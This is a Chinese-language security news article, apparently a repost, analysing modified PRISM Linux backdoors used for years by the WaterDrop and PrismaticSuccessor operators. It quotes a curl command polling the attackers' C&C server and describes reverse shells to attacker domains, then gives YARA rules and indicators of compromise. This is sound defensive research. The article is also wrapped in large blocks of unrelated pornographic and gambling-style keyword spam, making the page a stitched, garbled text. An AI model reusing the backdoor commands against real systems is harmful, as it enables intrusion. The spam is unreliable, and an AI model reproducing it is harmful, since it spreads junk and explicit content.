精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

潛伏四年,利用PRISM后門的攻擊者

安全 網站安全
安全研究人員最近發現了一組隱蔽性極強的 ELF 可執行文件,它們在 VirusTotal 上的殺軟檢出率很低或為零。

[[425063]]

AT&T 的安全研究人員最近發現了一組隱蔽性極強的 ELF 可執行文件,它們在 VirusTotal 上的殺軟檢出率很低或為零。在分析樣本后,AT&T 已將它們確定為多個攻擊者在多次攻擊行動中使用的開源 PRISM 后門的修改版。

深入分析了使用這些惡意軟件的攻擊活動,在長達三年半的時間內這些攻擊者仍然保持活躍。最早的攻擊行動中的樣本出現在 2017 年 11 月 8 日。

WaterDrop 分析

WaterDrop 的變種很容易識別,它包含一個名為 xencrypt的函數,該函數使用硬編碼的單字節 0x1F密鑰執進行異或加密。從 WaterDrop 變種的第 7 版開始,惡意樣本也包含純文本字符串 WaterDropx vX started,其中 X 是惡意樣本的版本號。到目前為止,已經觀察到版本 1、2.2 和 3 使用 PRISM 命名,而版本 7、9 和 12 被命名為 WaterDropx。

WaterDrop 使用 agent-waterdropx作為 User-Agent 進行 HTTP 協議的 C&C 通信,C&C 使用 waterdropx.com 域名的子域名。

盡管這些都是非常明顯的特征,但攻擊者仍然保持了在 VirusTotal 上極低的檢出率,這可能是因為攻擊行動的規模較小。

攻擊者在 2017 年 8 月 18 日注冊 waterdropx.com 域名。截至 2021 年 8 月 10 日,該域名仍在使用。

除了 PRISM 的基本功能外,WaterDrop 還額外引入了異或加密與定期輪詢 C&C 服務器的功能。

惡意軟件與 C&C 服務器的通信是純文本 HTTP 協議,且所有版本的惡意軟件都使用了 agent-waterdropx作為 User-Agent。

一些變種還會在以 root 權限執行時加載內核模塊。

版本進化

(1) PRISM v1

第一個版本的樣本就是使用 waterdropx.com 作為 C&C 域名的攻擊者使用的,他們的 User-Agent 相同。

與公開的 PRISM 相比,該版本創建了子進程,該子進程不斷向 C&C 服務器輪詢要執行的命令。

  1. curl -A 'agent-waterdropx' 'http://r.waterdropx.com:13858/tellmev2.x?v=1&act=touch

第一個版本的樣本沒有對惡意樣本進行任何混淆、加殼或者加密。

(2) PRISM v2.2

2.2 版本的 PRISM 開始使用異或加密來處理敏感數據,例如使用的 shell 命令等。單字節密鑰硬編碼為 0x1F,該密鑰用于發現同一攻擊者的所有樣本。

對于這個版本的惡意軟件,初始的 C&C URI 請求格式是:

  1. /tellmev2.x?v=2.2&act=touch 

(3) PRISM v3

3 版本的 PRISM 與 2.2 版本基本相同,額外多了 BOT ID 被保存到 /etc/.xid。

初始請求格式為:

  1. /tellmev2.x?v=3&act=touch&xid

(4) PRISM v7

Waterdrop v7 引入了內核模塊的使用,如果進程具有 root 權限,則使用 insmod 安裝。安全分析人員暫時無法確定此 Payload 的用途。

其余代碼與 PRISM v3 相同,僅更改了硬編碼版本號。其初始請求格式為:

  1. /tellmev2.x?v=7&act=touch&xid

(5) PRISM v9

延續之前版本的風格,Waterdrop v9 的變化微乎其微。在這個版本中發現的唯一變化是,使用 BOT ID 作為 ICMP 密碼來生成反向 Shell,而不是使用硬編碼的 ICMP 密碼。

初始請求格式為:

  1. /tellmev2.x?v=9&act=touch&xid

(6) PRISM v12

Waterdrop v12 與其前序版本幾乎相同,但增強了后門的穩定性。

其初始請求格式為:

  1. /tellmev2.x?v=12&act=touch&xid

惡意軟件家族 PrismaticSuccessor

域名 z0gg.me 可解析為由另外 12 個域名共享的 IP 地址。

一些存在重疊的域名是已知的 PRISM 的 C&C 域名,但 z0gg.me 也與幾個其他惡意樣本存在關聯。特別是,觀察到與 https://github.com/lirongchun/i存儲庫有關。

在這個存儲庫中,可以觀察到以下文件:

(1)三個包含 IP 地址(README.md)和端口號(README1.md 和 MP.md)的文檔

(2)針對臟牛(CVE-2016-5195)漏洞的 Bash 腳本,名為:111

(3)幾個 ELF 二進制文件,包括:

  • git:自定義惡意軟件植入工具
  • ass:為 x64 架構編譯的名為hide my ass的開源安全工具
  • ass32:為 x86 架構編譯的名為hide my ass的開源安全工具

由于攻擊者使用公共 GIT 存儲庫來托管其惡意軟件和基礎設施信息,可以查看歷史數據觀察其演變。

例如,我們可以使用以下命令收集參與者用作 C&C 服務器的所有 IP 地址:

  1. $ git log -p README.md |grep "^+"|grep -v "+++ 
  2. +45.199.88[.]86 
  3. +154.48.227[.]27 
  4. +207.148.118[.]141 
  5. +154.48.227[.]27 
  6. +165.22.136[.]80 
  7. +154.48.227[.]27 
  8. +156.236.110[.]79 
  9. +43.230.11[.]125 
  10. +172.247.127[.]136 
  11. +127.0.0[.1] 
  12. +192.168.3[.]173 
  13. +192.168.3[.]173:80 
  14. +192.168.3[.]173 
  15. +118.107.180[.]8 
  16. +s.rammus[.]me 
  17. +s.rammus[.]me:80 
  18. +192.168.3[.]150:80 
  19. +192.168.3[.]150^80 
  20. +192.168.3[.]150^ 
  21. +^192.168.3[.]150 
  22. +^192.168.3[.]133 
  23. $ shasum -a 256 * 
  24. 933b4c6c48f82bbb62c9b1a430c7e758b88c03800c866b36c2da2a5f72c93657  MP.out 
  25. f19043c7b06db60c8dd9ff55636f9d43b8b0145dffe4c6d33c14362619d10188  git 
  26. eeabee866fd295652dd3ddbc7552a14953d91b455ebfed02d1ccdee6c855718d  git (1) 
  27. 3a4998bb2ea9f4cd2810643cb2c1dae290e4fe78e1d58582b6f49b232a58575a  git (2) 
  28. 3366676681a31feadecfe7d0f5db61c4d6085f5081b2d464b6fe9b63750d4cd8  git (3) 
  29. cc3752cc2cdd595bfed492a2f108932c5ac28110f5f0d30de8681bd10316b824  git (4) 
  30. baf2fa00711120fa43df80b8a043ecc0ad26edd2c5d966007fcd3ffeb2820531  git (5) 
  31. eb64ee2b6fc52c2c2211018875e30ae8e413e559bcced146af9aa84620e3312f  git443 
  32. d1d65b9d3711871d8f7ad1541cfbb7fa35ecc1df330699b75dd3c1403c754278  git53 
  33. 77ddc6be62724ca57ff45003c5d855df5ff2b234190290545b064ee4e1145f63  gitest 
  34. 1de9232f0bec9bd3932ae3a7a834c741c4c378a2350b4bbb491a102362235017  hostname 
  35. 7ed15e59a094ca0f9ccac4c02865172ad67dcfc5335066f67fe3f11f68dd7473  ps 
  36. 1eb6973f70075ede421bed604d7642fc844c5a47c53d0fb7a9ddb21b0bb2519a  wm 
  37. 6f983303bb82d8cc9e1ebf8c6c1eb7c17877debc66cd1ac7c9f78b24148a4e46  wm (1) 
  38. e4fe57d9d2c78a097f38cba7a9aad7ca53da24ecbcad0c1e00f21d34d8a82de4  wm32 
  39. b08d48cc12c6afa5821a069bd6895175d5db4b5a9dde4e04d587c3dec68b1920  wmgithub 

按大小進行分組,可以發現大約 15K 的樣本是 PRISM 后門,而大約 1.1 MB 的樣本是另外的惡意軟件。

攻擊者在 2019 年 7 月 16 日提交了自定義 implant,該惡意軟件使用修改版的 UPX 加殼。

惡意軟件明顯變大是由于二進制文件靜態編譯進了 libcurl,AT&T 將這個惡意軟件家族命名為 PrismaticSuccessor。

分析可知,配置由兩個 URL 組成:

  • HostUrl 用于獲取 C&C 主機
  • PortUrl 用于獲取端口號

執行后會嘗試加鎖 /var/lock/sshd.lock來當作互斥量。

接下來,惡意軟件解密包含進程名稱的字符串,該字符串用于覆蓋 argv。

請注意,aMcwfkvf 變量包含 [mcwfkvf]值,該值在 src中被解密為 [kauditd]。解密使用 ROT13,密鑰為 -2。這個 ROT13 只處理大小字母,不處理符號和數字。

接下來,惡意軟件通過子進程進行多任務處理。

某個子進程會打開一個硬編碼 C&C 服務器的反向 Shell 會話,配置中最多有三個 C&C 地址(z0gg.me、x63.in 和 x47.in)并使用 ROT13 加密。

服務器還需要使用密碼進行回復,以便成功建立反向 Shell。惡意軟件會計算回復緩沖區的 MD5 哈希值,并將其與硬編碼值 ef4a85e8fcba5b1dc95adaa256c5b482進行比較。

無論主 C&C 服務器是否成功聯系,都會進行通信。

某個子進程通過 GitHub 獲取 C&C 主機和端口,并打開反向 Shell。

生成 Shell 的函數與 PRISM 源代碼很相似,但不完全相同。

某個子進程跳轉到 Shellcode 異或解密,硬編碼的 8 字節密鑰:

構建的命令如下所示:

在 StackOverflow 上也能發現有用戶抱怨被攻擊,與之相符。

其他變種

我們也觀察到其他攻擊者使用 PRISM 后門進行攻擊。然而,在大多數情況下,攻擊者者會原樣使用原始的 PRISM 后門,而不進行任何重大修改。某種程度上說,這也阻礙了我們正確跟蹤攻擊者的攻擊行動。

結論

PRISM 是一個開源的、簡單的后門。它的流量是清晰可辨的,惡意文件很容易被檢測到。其 C&C 服務器已經保持在線長達三年半。這表明,雖然受到更多關注的大型攻擊行動通常會在數小時內被檢測到,但較小的攻擊行動可能會被漏掉。

檢測方法

  1. rule PrismaticSuccessor : LinuxMalware 
  2. meta: 
  3. author = "AlienLabs" 
  4. description = "Prismatic Successor malware backdoor" 
  5. reference = "aaeee0e6f7623f0087144e6e318441352fef4000e7a8dd84b74907742c244ff5" 
  6. copyright = "Alienvault Inc. 2021" 
  7. strings: 
  8. $s1 = "echo -e \"
  9. $s2 = "[\x1B[32m+\x1B[0m]`/bin/hostname`" 
  10. $s3 = "[\x1B[32m+\x1B[0m]`/usr/bin/id`" 
  11. $s4 = "[\x1B[32m+\x1B[0m]`uname -r`" 
  12. $s5 = "[+]HostUrl->\t%s\n" 
  13. $s6 = "[+]PortUrl->\t%s\n" 
  14. $s7 = "/var/run/sshd.lock" 
  15. $shellcode = { 
  16. 48 31 C9 
  17. 48 81 E9 [4] 
  18. 48 8D 05 [4] 
  19. 48 BB [8] 
  20. 48 31 [2] 
  21. 48 2D [2-4] 
  22. E2 F4 
  23. $c1 = { 
  24. 8B 45 ?? 
  25. BE 00 00 00 00 
  26. 89 C7 
  27. E8 [4] 
  28. 8B 45 ?? 
  29. BE 01 00 00 00 
  30. 89 C7 
  31. E8 [4] 
  32. 8B 45 ?? 
  33. BE 02 00 00 00 
  34. 89 C7 
  35. E8 [4] 
  36. 8B 45 ?? 
  37. BA [4] 
  38. BE [4] 
  39. 89 C7 
  40. E8 
  41. condition: 
  42. uint32(0) == 0x464C457F and 
  43. filesize > 500KB and filesize < 5MB and 
  44. 5 of ($s*) and 
  45. all of ($c*) and 
  46. #shellcode == 2 
  47. rule PRISM { 
  48. meta: 
  49. author = "AlienLabs" 
  50. description = "PRISM backdoor" 
  51. reference = "https://github.com/andreafabrizi/prism/blob/master/prism.c" 
  52. strings: 
  53. $s1 = "I'm not root :(" 
  54. $s2 = "Flush Iptables:\t" 
  55. $s3 = " Version:\t\t%s\n" 
  56. $s4 = " Shell:\t\t\t%s\n" 
  57. $s5 = " Process name:\t\t%s\n" 
  58. $s6 = "iptables -F 2> /dev/null" 
  59. $s7 = "iptables -P INPUT ACCEPT 2> /dev/null" 
  60. $s8 = " started\n\n# " 
  61. $c1 = { 
  62. E8 [4] 8B 45 ?? BE 00 00 00 00 89 C7 E8 [4] 8B 45 ?? BE 01 00 00 00 
  63. 89 C7 E8 [4] 8B 45 ?? BE 02 00 00 00 89 C7 E8 [4] BA 00 00 00 00 
  64. BE [4] BF [4] B8 00 00 00 00 E8 
  65. $c2 = { 
  66. BA 00 00 00 00 
  67. BE 01 00 00 00 
  68. BF 02 00 00 00 
  69. E8 [4] 
  70. 89 45 [1] 
  71. 83 ?? ?? 00 
  72. condition: 
  73. uint32(0) == 0x464C457F and 
  74. filesize < 30KB and 
  75. (4 of ($s*) or all of ($c*)) 

IOC

  1. 05fc4dcce9e9e1e627ebf051a190bd1f73bc83d876c78c6b3d86fc97b0dfd8e8 
  2. 0af3e44967fb1b8e0f5026deb39852d4a13b117ee19986df5239f897914d9212 
  3. 0f42b737e30e35818bbf8bd6e58fae980445f297034d4e07a7e62a606d219af8 
  4. 0fba35856fadad942a59a90fc60784e6cceb1d8002af96d6cdf8e8c3533025f7 
  5. 342e7a720a738bf8dbd4e5689cad6ba6a4fc6dd6808512cb4eb294fb3ecf61cd 
  6. 3a3c701e282b7934017-dadc33d95e0cc57e43a124f14d852f39c2657e0081683 
  7. 5999c1a4a281a853378680f20f6133e53c7f6d0167445b968eb49b844f37eab5 
  8. 98fe5ed342da2b5a9d206e54b5234cfeeed35cf74b60d48eb0ef3dd1d7d7bd59 
  9. a8c68661d1632f3a55ff9b7294d7464cc2f3ece63a782c962f1dc43f0f968e33 
  10. af55b76d6c3c1f8368ddd3f9b40d1b6be50a2b97b25985d2dde1288ceab9ff24 
  11. b6844ca4d1d7c07ed349f839c861c940085f1a30bbc3fc4aad0b496e8d492ce0 
  12. b8215cafbea9c61df8835a3d52c40f9d2c6a37604dd329ef784e9d92bad1f30f 
  13. b8cceb317a5d2febcd60318c1652af61cd3d4062902820e79a9fb9a4717f7ba2 
  14. be7ec385e076c1c1f676d75e99148f05e754ef5b189e006fb53016ce9aef59e0 
  15. c679600b75c6e84b53f4e6e21f3acbec1621c38940c8f3756d0b027c7a058d9c 
  16. c802fa50409edf26e551ee0d134180aa1467a4923c759a2d3204948e14a52f12 
  17. c8525243a68cba92521fb80a73136aaa19794b4772c35d6ecfec0f82ecad5207 
  18. d3fa1155810be25f9b9a889ee64f845fc6645b2b839451b59cfa77bbc478531f 
  19. dd5f933598184426a626d261922e1e82cb009910c25447b174d46e9cac3d391a 
  20. e14d75ade6947141ac9b34f7f5743c14dbfb06f4dfb3089f82595d9b067e88c2 
  21. f126c4f8b4823954c3c69121b0632a0e2061ef13feb348eb81f634379d011913 
  22. 933b4c6c48f82bbb62c9b1a430c7e758b88c03800c866b36c2da2a5f72c93657 
  23. aaeee0e6f7623f0087144e6e318441352fef4000e7a8dd84b74907742c244ff5 
  24. baf2fa00711120fa43df80b8a043ecc0ad26edd2c5d966007fcd3ffeb2820531 
  25. f19043c7b06db60c8dd9ff55636f9d43b8b0145dffe4c6d33c14362619d10188 
  26. eeabee866fd295652dd3ddbc7552a14953d91b455ebfed02d1ccdee6c855718d 
  27. 3a4998bb2ea9f4cd2810643cb2c1dae290e4fe78e1d58582b6f49b232a58575a 
  28. 3366676681a31feadecfe7d0f5db61c4d6085f5081b2d464b6fe9b63750d4cd8 
  29. cc3752cc2cdd595bfed492a2f108932c5ac28110f5f0d30de8681bd10316b824 
  30. baf2fa00711120fa43df80b8a043ecc0ad26edd2c5d966007fcd3ffeb2820531 
  31. eb64ee2b6fc52c2c2211018875e30ae8e413e559bcced146af9aa84620e3312f 
  32. d1d65b9d3711871d8f7ad1541cfbb7fa35ecc1df330699b75dd3c1403c754278 
  33. 77ddc6be62724ca57ff45003c5d855df5ff2b234190290545b064ee4e1145f63 
  34. 1de9232f0bec9bd3932ae3a7a834c741c4c378a2350b4bbb491a102362235017 
  35. 7ed15e59a094ca0f9ccac4c02865172ad67dcfc5335066f67fe3f11f68dd7473 
  36. 1eb6973f70075ede421bed604d7642fc844c5a47c53d0fb7a9ddb21b0bb2519a 
  37. 6f983303bb82d8cc9e1ebf8c6c1eb7c17877debc66cd1ac7c9f78b24148a4e46 
  38. e4fe57d9d2c78a097f38cba7a9aad7ca53da24ecbcad0c1e00f21d34d8a82de4 
  39. b08d48cc12c6afa5821a069bd6895175d5db4b5a9dde4e04d587c3dec68b1920 
  40. 457467.com 
  41. zzz.457467.com 
  42. rammus.me 
  43. s.rammus.me 
  44. sw.rammus.me 
  45. wa1a1.com 
  46. www.wa1a1.com 
  47. waterdropx.com 
  48. r.waterdropx.com 
  49. spmood222.mooo.com 
  50. z0gg.me 
  51. x63.in 
  52. x47.in 
  53. 45.199.88.86 

 

責任編輯:趙寧寧 來源: FreeBuf
相關推薦

2023-04-21 19:01:55

2025-03-21 14:09:00

2022-05-05 16:24:21

APT網絡攻擊后門

2022-03-05 12:00:11

網絡釣魚網絡攻擊

2011-08-30 09:39:10

2016-01-05 15:54:32

2021-11-04 05:48:43

SSL加密攻擊勒索軟件

2014-08-20 09:44:57

2021-09-26 05:44:07

漏洞攻擊黑客

2020-12-30 09:27:55

漏洞DDoS攻擊網絡攻擊

2011-05-16 09:19:51

2016-10-17 09:20:20

2022-02-13 23:12:34

網絡釣魚谷歌Google

2022-01-04 11:58:49

Docker API網絡攻擊文件加密

2023-11-22 15:17:54

2021-06-02 10:51:44

勒索軟件攻擊數據泄露

2021-11-11 12:03:37

勒索軟件攻擊漏洞

2013-09-11 19:45:20

2014-10-08 09:25:30

2021-01-21 11:36:20

漏洞DNSpooq網絡攻擊
點贊
收藏

51CTO技術棧公眾號

日本免费网站在线观看| 免费中文字幕日韩| 啊啊啊久久久| 久久精品在线免费观看| 国产suv精品一区二区| 阿v天堂2014| 嫩呦国产一区二区三区av| 午夜欧美2019年伦理| 欧洲成人一区二区| 中文字幕在线观看1| 女主播福利一区| 国产视频久久久久| 国产欧美精品一二三| 国产ktv在线视频| 中文字幕国产一区二区| 国产精品.com| 国产精品露脸视频| 亚洲欧洲综合| 久久伊人色综合| 亚洲国产欧美视频| 日韩一区二区三区色| 色又黄又爽网站www久久| 欧美xxxx吸乳| 9191在线| 久久精品日韩一区二区三区| 999精品视频一区二区三区| 亚洲av无码精品一区二区| 欧美午夜精品| 久久精品国产免费观看| 男女做爰猛烈刺激| 美国一区二区| 欧美xxxx在线观看| 色黄视频免费看| 成人在线观看免费播放| 大桥未久av一区二区三区| 亚洲天堂第一区| 色开心亚洲综合| 国产亚洲欧美一区在线观看| 国产亚洲精品久久飘花| 精品国产九九九| 韩国精品一区二区| 国产精品久久久久久av下载红粉| www.日本精品| 欧美午夜一区| 欧美第一页在线| 永久免费看片直接| 99久久亚洲精品蜜臀| 中文字幕视频一区二区在线有码| 国产免费看av| 曰本一区二区三区视频| 日韩精品视频免费专区在线播放 | 欧美一区二区精品在线| 最近中文字幕一区二区| 精品无人乱码一区二区三区 | 欧美大片免费观看在线观看网站推荐| 三级在线观看免费大全| 999久久久91| 久久人人爽亚洲精品天堂| 91久久久久久久久久久久久久| 久久国产中文字幕| www.日韩欧美| 丁香花五月激情| 欧美精品国产一区| 久久久久久久久久久人体| 国产网址在线观看| 国产视频一区在线观看一区免费| 97在线观看视频国产| 亚洲精品男人天堂| 久久国产精品99国产| 国产大片精品免费永久看nba| 乱子伦一区二区三区| 免费看黄色91| 5g国产欧美日韩视频| 丁香六月色婷婷| 99久久久国产精品| 欧美日韩在线一二三| 91精品专区| 一区二区三区四区高清精品免费观看 | 欧美gayvideo| 久久91亚洲人成电影网站| 国产一级生活片| 久久av在线| 国产日韩欧美在线| 成人精品在线播放| 久久综合资源网| 在线免费观看成人网| 美女尤物在线视频| 91搞黄在线观看| 亚洲精品在线网址| 欧美激情影院| 日韩中文综合网| 国产一卡二卡在线| 日韩二区在线观看| 成人动漫在线视频| 免费在线一级视频| 亚洲精品一二三区| 浮妇高潮喷白浆视频| 久久亚洲国产精品尤物| 精品日韩成人av| 亚洲ⅴ国产v天堂a无码二区| 欧美日韩影院| 国产福利精品视频| 丰满岳乱妇国产精品一区| 久久精品欧美一区二区三区麻豆| 国产又粗又长又爽视频| 少妇一区视频| 精品精品国产高清a毛片牛牛 | 国产精品91在线观看| 精品二区在线观看| 久久久综合九色合综国产精品| 国产av不卡一区二区| 无码小电影在线观看网站免费| 欧美日韩高清影院| 疯狂揉花蒂控制高潮h| 91精品观看| 国产精品va在线播放| 欧美亚洲精品在线观看| 国产精品拍天天在线| 99蜜桃臀久久久欧美精品网站| 久久一级大片| 色噜噜狠狠狠综合曰曰曰| 日本少妇毛茸茸高潮| 国产一区二区三区在线观看精品| 欧美亚洲丝袜| 美女露胸视频在线观看| 欧美tickling挠脚心丨vk| 久久精品色妇熟妇丰满人妻| 久久aⅴ乱码一区二区三区| 国产高清自拍一区| 色婷婷av在线| 91精品免费观看| 国产视频123区| 久久亚洲电影| 精品综合久久| 精品三级久久| 亚洲国产91色在线| 国产亚洲第一页| 国产福利一区二区三区| 国产日韩欧美大片| 伊人久久大香| 久久这里有精品| 国产免费高清视频| 最新高清无码专区| 97超碰人人爽| 91精品国产乱码久久久久久| 国产欧美一区二区| 一本一道波多野毛片中文在线| 在线免费观看日本欧美| 四虎国产精品成人免费入口| 久久精品中文| 日韩和欧美的一区二区| 免费电影日韩网站| 亚洲色图综合久久| 波多野结衣黄色| 中文字幕的久久| 国内av一区二区| 综合天堂av久久久久久久| 91免费看网站| caoporn视频在线| 日韩av一区在线| 99超碰在线观看| 国产日韩欧美综合一区| 亚洲这里只有精品| 五月婷婷六月综合| 97视频资源在线观看| 国产粉嫩在线观看| 日韩国产精品一区| 婷婷激情五月综合| 欧美色爱综合| 亚洲女厕所小便bbb| 蜜桃福利午夜精品一区| 亚洲情侣在线| 国产自产精品| 91精品影视| 久久视频这里只有精品| 精品国产区一区二| 天天操天天色综合| 永久免费av无码网站性色av| 久久超碰97人人做人人爱| 91精品国产毛片武则天| 老司机aⅴ在线精品导航| 欧美孕妇与黑人孕交| 五月天婷婷在线视频| 日韩欧美一级特黄在线播放| www日韩精品| 国产欧美在线观看一区| 91aaa精品| 先锋影音久久久| 亚洲资源在线网| 国产成人一二片| 国产精品偷伦视频免费观看国产| 18av在线播放| 亚洲天堂av电影| 99热这里只有精品在线| 欧美日韩色婷婷| 亚洲色图100p| 99久久99久久综合| 五月天av在线播放| 99国产精品视频免费观看一公开 | av在线播放网址| 日韩和欧美一区二区三区| www.18av.com| 精品久久久久中文字幕小说| 国产精品区免费视频| 澳门av一区二区三区| 久久久久这里只有精品| 在线免费观看黄色| 日韩精品免费一线在线观看| 国产伦精品一区二区三区四区| 欧美日韩在线免费| 丰满少妇被猛烈进入一区二区| 久久婷婷国产综合精品青草| 最好看的中文字幕| 美国欧美日韩国产在线播放| 人妻久久久一区二区三区| 伊人色**天天综合婷婷| 日韩国产精品一区二区| 日韩大片在线免费观看| 97se亚洲综合| 欧洲亚洲精品| 国产成人精品av| 九九色在线视频| 美女少妇精品视频| 淫片在线观看| 中文字幕日本欧美| 免费国产在线视频| 亚洲精品久久久久久久久| www.蜜桃av.com| 欧美精品日日鲁夜夜添| 亚洲中文无码av在线| 日本精品视频一区二区| 天天做天天爱夜夜爽| 亚洲观看高清完整版在线观看| 日本福利片在线观看| 国产精品视频观看| 亚洲不卡的av| 国产精品视频麻豆| 亚洲av毛片基地| 国产欧美日韩精品在线| 日韩精品无码一区二区三区久久久 | 一本色道久久加勒比精品 | 国产精品毛片一区视频| 成人亚洲精品| 成人免费福利在线| 99久久999| 成人久久久久久久| 电影一区二区三区久久免费观看| 国产日韩精品一区二区| yy6080久久伦理一区二区| 国产精品久久二区| 久久xxx视频| 国产日韩精品入口| 中文成人激情娱乐网| 亚洲japanese制服美女| 久久久精品区| 国产精品久久九九| 久久影视三级福利片| 久久免费看av| 国产99久久久国产精品成人免费| 欧美精品亚洲| 北条麻妃国产九九九精品小说| 日韩欧美在线电影| 日韩片欧美片| 大地资源网在线观看免费官网 | 国产真实乱子伦| 久久精品天堂| 精品999在线| 国产精品资源在线看| 91精品啪在线观看国产| gogogo免费视频观看亚洲一| 国产伦理片在线观看| 国产精品美女久久福利网站| 日本精品人妻无码77777| 亚洲一区二区三区四区五区黄| 日韩欧美中文字幕一区二区| 色综合天天综合网天天看片| 中文字幕日韩国产| 日韩一区二区电影网| 天堂网在线中文| 一区二区三区亚洲| 2021国产在线| 人九九综合九九宗合| 国产69精品久久久久9999人| 999久久久| 中日韩免视频上线全都免费| 一区不卡视频| 99热这里只有成人精品国产| caoporn超碰97| 国产成人精品亚洲日本在线桃色| 丰满大乳奶做爰ⅹxx视频| 国产精品美女久久久久久久久久久 | 日本wwwwwww| 久久精品一区二区| 日韩一级片av| 在线看日本不卡| www国产一区| 夜夜嗨av一区二区三区四区| 欧美hdxxx| 国产精品视频白浆免费视频| 中文字幕一区日韩精品 | 免费理论片在线观看播放老| 久久中文久久字幕| 都市激情亚洲一区| 亚洲自拍偷拍区| 欧美色就是色| 欧美精品久久久久久久免费| 九九精品视频在线看| av在线网站观看| 一区二区三区中文在线| 中文字幕有码无码人妻av蜜桃| 亚洲电影免费观看高清完整版在线观看| 超碰免费在线| 91国产高清在线| 欧美a级大片在线| 小说区图片区图片区另类灬| 国产日韩欧美一区二区三区在线观看| 色婷婷一区二区三区在线观看| 久久久久久久免费视频了| 久久精品性爱视频| 337p亚洲精品色噜噜| 成年人视频在线看| 日本一区二区在线播放| 国产精品香蕉| 日韩精品一区二区三区四| 久久91精品国产91久久小草| 欧美另类z0zx974| 狠狠色狠狠色综合日日小说| 免费观看a视频| 欧美大片网站在线观看| 成人污版视频| 最新视频 - x88av| 黄色小说综合网站| 日本精品久久久久中文| 色88888久久久久久影院野外| 天天干天天摸天天操| 久久久久女教师免费一区| 成人黄色理论片| 先锋影音男人资源| 精品一区二区影视| 国产黄a三级三级| 欧美三级三级三级爽爽爽| 成人性生交大片免费看午夜| 日本久久中文字幕| 少妇精品久久久一区二区| www.com毛片| 久久一区二区三区四区| 亚洲免费黄色网址| 亚洲欧美在线播放| 欧美天堂视频| 日韩一区国产在线观看| 奇米影视一区二区三区| 人妻精品久久久久中文| 欧美三区在线观看| 精产国品自在线www| 91理论片午午论夜理片久久| 正在播放日韩欧美一页 | 伊人网中文字幕| 精品国产一区二区三区久久狼5月 精品国产一区二区三区久久久狼 精品国产一区二区三区久久久 | 极品久久久久久| 日韩精品中文字幕一区二区三区 | 岛国视频午夜一区免费在线观看| 污污视频在线免费看| 日本不卡高字幕在线2019| 精品美女在线视频| 日韩 国产 一区| 亚洲一线二线三线久久久| 香蕉视频网站在线| 日韩av免费在线看| 国产高清一区| 久久久久亚洲av无码网站| 精品久久久久久久久久ntr影视| 四虎影视在线观看2413| 国产精品久久久久久久久久小说| 91精品国产麻豆国产在线观看| 成年人性生活视频| 午夜久久久影院| av天在线观看| 成人av免费在线看| 香蕉久久久久久久av网站| 永久免费观看片现看| 日韩欧美aaaaaa| 日韩成人av电影| 亚洲自拍偷拍一区二区三区| 99精品桃花视频在线观看| 免费在线不卡av| 欧美精品激情视频| 欧美日韩国产免费观看视频| 中文字幕第10页| 在线亚洲精品福利网址导航| 中文字幕在线三区| 欧美极品视频一区二区三区| 精品一区二区三区的国产在线播放| 久久高清免费视频| 在线观看91久久久久久| 亚洲精品a区| 黄色在线视频网| 天天操天天色综合| 曰本三级在线| 日韩区国产区| 99视频超级精品|